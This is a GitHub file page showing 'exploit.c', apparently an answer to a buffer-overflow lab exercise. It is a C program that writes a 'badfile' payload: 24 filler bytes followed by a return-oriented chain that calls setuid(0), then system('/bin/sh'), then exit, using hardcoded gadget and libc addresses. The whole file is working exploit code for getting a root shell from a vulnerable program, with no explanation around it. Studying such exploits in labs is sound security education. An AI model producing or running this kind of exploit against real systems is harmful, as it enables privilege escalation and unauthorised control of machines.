-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.c
More file actions
38 lines (25 loc) · 824 Bytes
/
exploit.c
File metadata and controls
38 lines (25 loc) · 824 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
/* exploit.c */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#define BUF_LEN 24
int main(int argc, char **argv)
{
char buf[80];
FILE *badfile;
badfile = fopen("./badfile", "w");
for (int i=0; i<BUF_LEN; i++) {
buf[i]='A';
}
/* You need to decide the addresses and
the values for X, Y, Z etc. */
*(long *)&buf[BUF_LEN] = 0x0000000000400743; //pop rdi; ret
*(long *)&buf[BUF_LEN + 8] = 0; //setuid 0
*(long *)&buf[BUF_LEN + 16] = 0x7ffff7ada700; //setuid
*(long *)&buf[BUF_LEN + 24] = 0x0000000000400743; // pop rdi; ret
*(long *)&buf[BUF_LEN + 32] = 0x7ffff7b9a177; // /bin/sh
*(long *)&buf[BUF_LEN + 40] = 0x7ffff7a53390; // system
*(long *)&buf[BUF_LEN + 48] = 0x7ffff7a48030; //exit
fwrite(buf, sizeof(buf), 1, badfile);
fclose(badfile);
}